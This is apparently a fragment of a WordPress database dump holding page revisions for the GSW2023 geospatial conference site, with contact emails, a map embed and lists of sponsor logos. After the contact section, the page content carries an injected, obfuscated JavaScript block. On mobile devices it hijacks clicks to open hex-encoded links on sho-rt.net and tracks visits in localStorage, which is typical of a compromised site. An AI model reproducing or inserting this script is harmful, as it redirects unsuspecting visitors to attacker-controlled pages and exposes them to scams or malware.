link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-30 17:22:33','2023-08-30 17:22:33','',3066,'https://gsw2023.com/?p=5440',0,'revision','',0),
(5441,1,'2023-08-30 17:25:10','2023-08-30 17:25:10','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" 